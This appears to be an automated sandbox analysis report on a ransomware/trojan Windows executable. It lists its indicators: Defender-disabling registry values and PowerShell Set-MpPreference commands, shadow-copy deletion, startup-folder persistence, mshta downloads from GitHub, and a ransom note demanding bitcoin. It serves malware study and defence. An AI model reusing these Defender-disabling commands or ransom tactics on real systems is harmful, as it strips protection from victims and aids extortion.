cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

Analysis

max time kernel
142s
max time network
149s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
27-02-2024 00:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Size

82KB
MD5

e01e11dca5e8b08fc8231b1cb6e2048c
SHA1

4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512

298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
SSDEEP

1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/3696-0-0x0000000000DB0000-0x0000000000DCA000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Blocklisted process makes network request 4 IoCs

Processes:

mshta.exe

flow pid process

13 5272 mshta.exe
16 5272 mshta.exe
18 5272 mshta.exe
19 5272 mshta.exe
Downloads MZ/PE file

flow	pid	process
13	5272	mshta.exe
16	5272	mshta.exe
18	5272	mshta.exe
19	5272	mshta.exe

Drops startup file 1 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

3 raw.githubusercontent.com
11 raw.githubusercontent.com
2 raw.githubusercontent.com

flow	ioc
3	raw.githubusercontent.com
11	raw.githubusercontent.com
2	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3640 sc.exe
1012 sc.exe
3484 sc.exe
4676 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3640	sc.exe
1012	sc.exe
3484	sc.exe
4676	sc.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
792	vssadmin.exe
2572	vssadmin.exe
796	vssadmin.exe
5112	vssadmin.exe
1908	vssadmin.exe
2524	vssadmin.exe
2932	vssadmin.exe
3792	vssadmin.exe
3680	vssadmin.exe
2536	vssadmin.exe
3596	vssadmin.exe
3388	vssadmin.exe
2372	vssadmin.exe
3624	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3044 taskkill.exe
5068 taskkill.exe
2328 taskkill.exe

pid	process
3044	taskkill.exe
5068	taskkill.exe
2328	taskkill.exe

Modifies registry class 2 IoCs

Processes:

OpenWith.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings	firefox.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6332 PING.EXE

pid	process
6332	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exe

pid	process
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4432	powershell.exe
4432	powershell.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Token: SeDebugPrivilege	4432	powershell.exe
Token: SeIncreaseQuotaPrivilege	4432	powershell.exe
Token: SeSecurityPrivilege	4432	powershell.exe
Token: SeTakeOwnershipPrivilege	4432	powershell.exe
Token: SeLoadDriverPrivilege	4432	powershell.exe
Token: SeSystemProfilePrivilege	4432	powershell.exe
Token: SeSystemtimePrivilege	4432	powershell.exe
Token: SeProfSingleProcessPrivilege	4432	powershell.exe
Token: SeIncBasePriorityPrivilege	4432	powershell.exe
Token: SeCreatePagefilePrivilege	4432	powershell.exe
Token: SeBackupPrivilege	4432	powershell.exe
Token: SeRestorePrivilege	4432	powershell.exe
Token: SeShutdownPrivilege	4432	powershell.exe
Token: SeDebugPrivilege	4432	powershell.exe
Token: SeSystemEnvironmentPrivilege	4432	powershell.exe
Token: SeRemoteShutdownPrivilege	4432	powershell.exe
Token: SeUndockPrivilege	4432	powershell.exe
Token: SeManageVolumePrivilege	4432	powershell.exe
Token: 33	4432	powershell.exe
Token: 34	4432	powershell.exe
Token: 35	4432	powershell.exe
Token: 36	4432	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	2328	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	5068	taskkill.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeIncreaseQuotaPrivilege	1392	powershell.exe
Token: SeSecurityPrivilege	1392	powershell.exe
Token: SeTakeOwnershipPrivilege	1392	powershell.exe
Token: SeLoadDriverPrivilege	1392	powershell.exe
Token: SeSystemProfilePrivilege	1392	powershell.exe
Token: SeSystemtimePrivilege	1392	powershell.exe
Token: SeProfSingleProcessPrivilege	1392	powershell.exe
Token: SeIncBasePriorityPrivilege	1392	powershell.exe
Token: SeCreatePagefilePrivilege	1392	powershell.exe
Token: SeBackupPrivilege	1392	powershell.exe
Token: SeRestorePrivilege	1392	powershell.exe
Token: SeShutdownPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeSystemEnvironmentPrivilege	1392	powershell.exe
Token: SeRemoteShutdownPrivilege	1392	powershell.exe
Token: SeUndockPrivilege	1392	powershell.exe
Token: SeManageVolumePrivilege	1392	powershell.exe
Token: 33	1392	powershell.exe
Token: 34	1392	powershell.exe
Token: 35	1392	powershell.exe
Token: 36	1392	powershell.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exefirefox.exe

pid	process
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
5264	firefox.exe
5264	firefox.exe
5264	firefox.exe
5264	firefox.exe

Suspicious use of SendNotifyMessage 6 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exefirefox.exe

pid	process
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
5264	firefox.exe
5264	firefox.exe
5264	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

OpenWith.exefirefox.exe

pid process

3992 OpenWith.exe
5264 firefox.exe

pid	process
3992	OpenWith.exe
5264	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	pid	process	target process
PID 3696 wrote to memory of 4432	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4432	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1392	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1392	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 3520	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 3520	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4036	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4036	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1984	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1984	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4772	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4772	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 3504	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 3504	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 2828	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 2828	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 3844	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 3844	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1404	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1404	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1208	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 1208	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4776	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4776	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 560	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 560	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3696 wrote to memory of 4448	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4448	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 312	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 312	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 516	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 516	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 528	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 528	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2180	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2180	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4156	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4156	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4152	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4152	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4272	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4272	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4148	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4148	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4056	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4056	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 208	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 208	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 200	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 200	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2836	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2836	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2312	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2312	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 1484	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 1484	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 1408	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 1408	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2176	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2176	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2668	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 2668	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4212	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3696 wrote to memory of 4212	3696	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
